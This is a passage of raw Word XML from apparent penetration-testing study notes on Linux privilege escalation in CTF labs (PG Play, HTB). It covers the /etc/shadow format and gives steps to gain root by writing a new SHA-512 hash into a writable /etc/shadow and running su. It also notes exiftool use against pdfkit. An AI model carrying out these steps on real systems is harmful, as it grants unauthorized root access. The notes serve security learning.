      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Home Folder: "/home/joe" - Describes the user's home directory prompted upon login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login Shell: "/bin/bash" - Indicates the default interactive shell, if one exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC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D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fwvju090ac18" w:id="413"/>
      <w:bookmarkEnd w:id="413"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3771900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="464" name="image467.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image467.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102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2ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1027">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the format of /etc/shadow entires:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username:password:last_change:min:max:warn:inactive:expire:reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords are likely in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA512 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">format as seen by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$6$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for example, in the first entry, we see root and a hashed password. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1155700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="472" name="image453.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image453.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1028"/>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2EDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see this output from Linux Smart Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can read /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sq5miv8yieyt" w:id="414"/>
      <w:bookmarkEnd w:id="414"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit /etc/shadow when you can write to it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius Linux Priv Esc course. Video is Weak File Permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="1647825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId419"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="29813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2EE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see from Linux Smart Enumeration that we can write to /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a new SHA512 password (do this in your Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="546100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="111" name="image133.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image133.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1029"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkpasswd -m sha-512 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newpassword</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with root user's password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in password "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newpassword</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2EEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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EF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tk70bem81tcg" w:id="415"/>
      <w:bookmarkEnd w:id="415"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To examine photos, we can use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exiftool [name of the file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1361"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if we are not in the same directory as the photo, we can set the path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EF9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5429250" cy="3352800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="316" name="image301.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image301.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1030"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="54292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2EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="875"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the "Precious" Easy HTB, we see that the photo is generated by pdfkit v0.8.6 which had vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xfg4zyatkepr" w:id="416"/>
      <w:bookmarkEnd w:id="416"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool vulnerability and cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
